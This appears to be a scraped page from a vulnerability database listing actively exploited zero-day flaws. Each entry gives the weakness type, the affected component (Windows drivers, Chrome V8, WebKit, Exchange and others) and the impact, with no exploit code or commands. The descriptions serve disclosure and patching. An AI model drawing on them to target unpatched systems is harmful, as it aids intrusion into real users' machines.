Zero-day Vulnerability Database

Improper access control

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper access restrictions in the master service interface on port 7741/TCP. A remote attacker can send a specially crafted request to the affected server and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data. A remote attacker can pass specially crafted data to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Information disclosure

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to the application leaks the Net-NTLMv2 hash. A remote attacker can send a specially crafted email to the victim and obtain the Net-NTLMv2 hash of the Windows account. The victim does not need to open the email, as the vulnerability is triggered automatically when it is retrieved and processed by the email server, e.g. before the email is viewed in the preview pane.

The obtained NTLMv2 hash can be used in the NTLM Relay attack against another service to authenticate as the user.

Note, the vulnerability is being actively exploited in the wild.

Security features bypass

The vulnerability allows a remote attacker to bypass implemented security restrictions.

The vulnerability exists due to incorrect implementation of the Windows SmartScreen Security Feature. A remote attacker can trick the victim to open a specially crafted file and bypass the Mark of the Web (MOTW) defenses.

Note, the vulnerability is being actively exploited in the wild.

Path traversal

The vulnerability allows a local user to perform directory traversal attacks.

The vulnerability exists due to input validation error when processing certain CLI command. A local user can read and write arbitrary files on the system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Graphics Component. A local user can trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error in Windows Common Log File System Driver. A local user can trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Security features bypass

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to unspecified error when processing files. A remote attacker can trick the victim to open a specially crafted file, bypass Office macro policies used to block untrusted or malicious files and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error when parsing web content in WebKit. A remote attacker can trick the victim to visit a specially crafted website, trigger a type confusion error and execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in the wild.

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data passed to the "/goanywhere/lic/accept" HTTP endpoint of the administrative web interface. A remote attacker can send a specially crafted HTTP request to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Advanced Local Procedure Call (ALPC). A local user can trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error in WebKit. A remote attacker can trick the victim to visit a specially crafted website, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Improper control of a resource through its lifetime

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper access restrictions in systems configured as a SAML SP or a SAML IdP. A remote non-authenticated attacker can gain unauthorized access to the system.

Note, the vulnerability is being actively exploited in the wild.

Security features bypass

The vulnerability allows a remote attacker to bypass implemented security restrictions.

The vulnerability exists due to an error in Windows SmartScreen. A remote attacker can bypass Mark of the Web (MOTW) defenses and potentially compromise the affected system.

Note, the vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the sslvpnd daemon. A remote non-authenticated attacker can pass specially crafted data to the SSL-VPN interface, trigger a heap-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error within the V8 engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a boundary error when processing untrusted HTML content in GPU. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in the wild.

Security features bypass

The vulnerability allows a remote attacker to compromise the target system.

The vulnerability exists due to security features bypass in Windows Mark of the Web functionality. A remote attacker can trick a victim to open a specially crafted file and bypass Protected View in Microsoft Office, as demonstrated using a specially crafted ZIP archive.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows CNG Key Isolation Service. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing HTML content within the JScript9 engine. A remote attacker can trick the victim into visiting a malicious website, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Print Spooler. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error within the V8 engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Out-of-bounds write

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the OS kernel component. A local application can trigger an out-of-bounds write error and execute arbitrary code with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows COM+ Event System Service. A local user can trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Missing Authorization

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to missing authorization in the management functionality responsible for file uploads. A remote non-authenticated attacker can upload a malicious file on the server and execute it.

Successful exploitation of the vulnerability may result in full system compromise.

Note, the vulnerability is being exploited in the wild.

Server-Side Request Forgery (SSRF)

The disclosed vulnerability allows a remote user to perform SSRF attacks.

The vulnerability exists due to insufficient validation of user-supplied input within the Exchange OWA  Autodiscover service.. A remote user can send a specially crafted HTTP request and trick the application to initiate requests to arbitrary systems.

Successful exploitation of this vulnerability may allow a remote attacker to execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in the wild.

Deserialization of Untrusted Data

The vulnerability allows a remote user to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data. A remote user with access to PowerShell Remoting on vulnerable Exchange systems can pass specially crafted data to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Code Injection

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation in the User Portal and Webadmin interfaces of Sophos Firewall. A remote non-authenticated attacker can send a specially crafted request and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Common Log File System Driver. A local unprivileged user can run a specially crafted program to trigger memory corruption and execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Insufficient verification of data authenticity

The vulnerability allows a remote user to compromise the affected system.

The vulnerability exists due to improper input validation within the rollback functionality. A remote authenticated user with access to the administrative console can force the agent into downloading unverified rollback components and compromise the affected system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the OS kernel. A local application can trigger memory corruption and execute arbitrary code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Improper Authorization

The vulnerability allows a remote attacker to compromise the web application.

The vulnerability exists due to missing authorization checks. A remote non-authenticated attacker can send a specially crafted request to the affected plugin and add an administrative user account into your WordPress installation.

Successful exploitation of the vulnerability may allow an attacker to execute arbitrary PHP code on the server.

Note, the vulnerability is being actively exploited in the wild as of September 8.

Improper Authorization

The vulnerability allows a remote attacker to download arbitrary files from the server.

The vulnerability exists due to missing authorization for the feature responsible for remote downloading remote backups. A remote non-authenticated attacker can download arbitrary files from the server. 

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to unspecified vulnerability. A remote non-authenticated attacker can send a specially crafted request to the affected system and execute arbitrary code.

Note, the vulnerability is being actively exploited in the wild by the DeadBolt ransomware.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to insufficient validation of user-supplied input within the Mojo component in Google Chrome. A remote attacker can trick the victim into visiting a specially crafted website and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Improper access control

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper access restrictions to the default installation page. A remote attacker can connect to the default installation URL and create an administrative user account.

Note, the vulnerability is being active exploited in the wild.

Out-of-bounds write

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a boundary error in WebKit when processing HTML content. A remote attacker can create a specially crafted website, trick the victim into opening it, trigger an out-of-bounds write and execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in the wild.

Out-of-bounds write

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the OS kernel component. A local application can trigger an out-of-bounds write error and execute arbitrary code on the system with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation in Intents component in Google Chrome. A remote attacker can trick the victim to open a specially crafted web page and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error in Windows Support Diagnostic Tool (MSDT) when processing files. A remote attacker can create a specially crafted file, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Microsoft Windows Client/Server Runtime Subsystem (CSRSS). A local user can run a specially crafted program to execute arbitrary code with SYSTEM privileges.

Note, the vulnerability is being actively exploited in the wild.

Heap-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within WebRTC implementation. A remote attacker can trick the victim ti visit a specially crafted website, trigger a heap-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

OS Command Injection

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system.

The vulnerability exists due to improper input validation in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA). A remote unauthenticated attacker can send a specially crafted HTTP GET request to the application and execute arbitrary OS commands on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Code Injection

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper input validation when processing OGNL expressions. A remote non-authenticated attacker can send a specially crafted request to the Confluence Server and execute arbitrary code on the system.

OS Command Injection

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system.

The vulnerability exists due to improper input validation when processing URL within the Microsoft Windows Support Diagnostic Tool (MSDT). A remote unauthenticated attacker can trick the victim to open a specially crafted file, which calls the ms-msdt tool and execute arbitrary OS commands on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

UPDATED

The vulnerability resides within MSTD and not in Microsoft Word. Microsoft Word is an attack vector and not the source of vulnerability.

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to sensitive information.

The vulnerability exists due to unrestricted access to the Redis instance running within the NOSi container, accessible via port 6379/tcp (the health check RPM opens this port by default). A remote non-authenticated attacker can connect to the Redis instance and obtain sensitive information or modify it.

Note, the vulnerability is being actively exploited in the wild.

Man-in-the-Middle (MitM) attack

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists within the Windows LSA service. A remote attacker can call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. As a result, an attacker can obtain credentials and compromise the affected system via the NTLM Relay Attack.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error in V8 engine in Google Chrome. A remote attacker can trick the victim to visit a specially crafted web page, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Common Log File System Driver. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Out-of-bounds read

The vulnerability allows a local user to gain access to potentially sensitive information.

The vulnerability exists due to a boundary condition within Intel Graphics Driver. A local user can  trigger an out-of-bounds read error and read contents of kernel memory.

Note, the vulnerability is being actively exploited in the wild.

Out-of-bounds write

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the AppleAVD subsystem. A local user can run a specially crafted program to trigger an out-of-bounds write and execute arbitrary code with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to improper access restrictions in the Trend Micro Apex Central management console. A remote non-authenticated attacker can upload arbitrary file to the system and execute it.

Note, the vulnerability is being actively exploited in the wild.

Code Injection

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation. A remote attacker can send a specially crafted HTTP request to the affected application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

This vulnerability was dubbed "Spring4Shell".

Input validation error

The vulnerability allows a remote attacker to compromise the affected device.

The vulnerability exists due to insufficient validation of user-supplied input in the User Portal and Webadmin. A remote attacker can send specially crafted requests to the web interface and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise the affected device.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing messages in the WebGPU IPC framework. A remote attacker can trick the victim to open a specially crafted web page, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing XSLT parameter. A remote attacker can trick the victim to open a specially crafted web page, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the Animation component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

OS Command Injection

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system.

The vulnerability exists due to improper input validation. A remote unauthenticated attacker can send  a specially crafted HTTP POST request to the application and execute arbitrary OS commands on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content in WebKit. A remote attacker can trick the victim to visit a specially crafted web page, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Cross-site scripting

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Note, the vulnerability is being actively exploited in the wild in the targeted attacks aimed to exfiltrated data.

Buffer overflow

The vulnerability allows a malicious application to execute arbitrary code with elevated privileges.

The vulnerability exists due to a boundary error within the IOMobileFrameBuffer subsystem. A malicious application can trigger buffer overflow and execute arbitrary code with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Win32k.sys driver. A local user can run a specially crafted program to trigger a buffer overflow and execute arbitrary code on the system with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to insufficient validation of user-supplied input in the Phone Apps (restapps) module for FreePBX. A remote attacker can send specially crafted input to the application and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the V8 engine. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Permissions, Privileges, and Access Controls

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to incorrect permissions in windows installer service. A local user can run a specially crafted program to execute arbitrary code with SYSTEM privileges.

The vulnerability exists due to incomplete patch for #VU58061 (CVE-2021-41379).

Note, the vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload in the web management interface. A remote attacker can upload a malicious file and execute it on the server.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper input validation when processing Excel files. A remote attacker can create a specially crafted Excel file, trick the victim into opening it and execute arbitrary code on the system.

Note, the vulnerability is being exploited in the wild.

Input validation error

The vulnerability allows a remote user to compromise the affected system.

The vulnerability exists due to insufficient validation of cmdlet arguments. A remote user can run a specially crafted cmdlet and execute arbitrary commands on the system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a malicious application to escalate privileges on the system.

The vulnerability exists due to a use-after-free error in the Android kernel component within the epoll_loop_check_proc() function. A malicious application can trigger a use-after-free error and execute arbitrary code with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Improperly implemented security check for standard

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to incorrect implementation in the V8 engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it and compromise the system.

Note, the vulnerability is being actively exploited in the wild.

Exposed dangerous method or function

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to insecure implementation in V8 engine in Google Chrome. A remote attacker can create a specially crafted website, trick the victim into visiting it and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

SQL injection

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

Use-after-free

Integer overflow

The vulnerability allows a malicious application to escalate privileges on the system.

The vulnerability exists due to a boundary error within the IOMobileFrameBuffer subsystem. A malicious application can trigger integer overflow and execute arbitrary code on with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Path traversal

The vulnerability allows a remote attacker to perform directory traversal attacks.

The vulnerability exists due to input validation error when processing directory traversal sequences. A remote attacker can send a specially crafted HTTP request to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.

The vulnerability can be used to execute arbitrary OS commands on the system.

Note, the vulnerability is being actively exploited in the wild.

Information disclosure

The vulnerability allows a remote attacker to gain access to potentially sensitive information.

The vulnerability exists due to excessive data output in core in Google Chrome. A remote attacker can trick the victim to open a specially crafted web page and gain access to sensitive information.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the V8 browser engine in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content within the Portals component in Google Chrome. A remote attacker can create a specially crafted website, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a type confusion error within the XNU subsystem. A local user can run a specially crafted program to trigger a type confusion error and execute arbitrary code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Deserialization of Untrusted Data

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to insecure input validation when processing serialized data within the Core Telephony service. A local application can pass specially crafted data to the service and execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in the wild.

Code Injection

The vulnerability allows a remote user to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation. A remote administrator can execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the Indexed DB API component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in-the-wild.

Out-of-bounds write

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a boundary error when processing untrusted HTML content in V8. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger out-of-bounds write and execute arbitrary code on the target system.

Note, the vulnerability is being actively exploited in-the-wild.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content in WebKit. A remote attacker can trick the victim to visit a specially crafted web page, trigger a use-after-free error and execute arbitrary code on the system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in-the-wild.

Improper access control

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to improper access restrictions to the "/RestAPI/LogonCustomization" and "/RestAPI/Connection" REST API endpoints. A remote non-authenticated attacker can send specially HTTP requests to the aforementioned REST API endpoints and execute arbitrary code on the system.

Note, the vulnerability is being actively exploited in the wild.

Code Injection

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation within the MSHTML component. A remote attacker can create a specially crafted Office document with a malicious ActiveX control inside, trick the victim into opening the document and execute arbitrary code on the system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Integer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to integer overflow when processing PDF files within the CoreGraphics component. A remote attacker can trick the victim to open a specially crafted PDF file, trigger integer overflow and execute arbitrary code on the target system.

Note, the vulnerability is being active exploited in-the-wild via the FORCEDENTRY tool against Bahraini activists.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Update Medic Service. A local user can run a specially crafted program to execute arbitrary code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error. A local user can run a specially crafted program to trigger memory corruption and execute arability code with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Arbitrary file upload

The vulnerability allows a remote user to compromise vulnerable system.

The vulnerability exists due to insufficient validation of file during file upload within the product’s management console . A remote user can upload a malicious file and execute it on the server.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local application to escalate privileges on the system.

The vulnerability exists due to a boundary within the IOMobileFrameBuffer subsystem. A local application can trigger memory corruption and execute arbitrary code on the target system with kernel privileges.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

SQL injection

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error in Windows kernel. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code on the system with elevated privileges.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing HTML content in Microsoft scripting engine. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error. A local user can run a specially crafted program to trigger memory corruption and execute arbitrary code on the system with elevated privileges.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error. A remote attacker can send a specially crafted request to the Serv-U server, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Input validation error

The vulnerability allows a remote attacker to compromise the affected system.

The vulnerability exists due to unspecified error. A remote attacker can compromise the affected system.

Note, the vulnerability is being actively exploited in the wild by the REvil ransomware.

Code Injection

The vulnerability allows a remote user to execute arbitrary code on the target system.

The vulnerability exists due to improper input validation within the RpcAddPrinterDriverEx() function. A remote user can send a specially crafted request to the Windows Print Spooler and execute arbitrary code with SYSTEM privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being considered a zero-day and dubbed PrintNightmare. This is a different vulnerability than #VU54508 (CVE-2021-1675).

Improper access control

The vulnerability allows a remote attacker to delete all data on the system.

The vulnerability exists due to improper access restrictions to the administrator API. A remote non-authenticated attacker can send a specially crafted HTTP request to the exposed API and perform a system factory restore, deleting all data on the NAS device.

Note, the vulnerability is being actively exploited in the wild along with vulnerability #VU15460.

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error within the WebGL component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing HTML content within the WebKit component in Apple iOS. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a use-after-free error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing HTML content within the WebKit component in Apple iOS. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note, the vulnerability is being actively exploited in the wild.

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

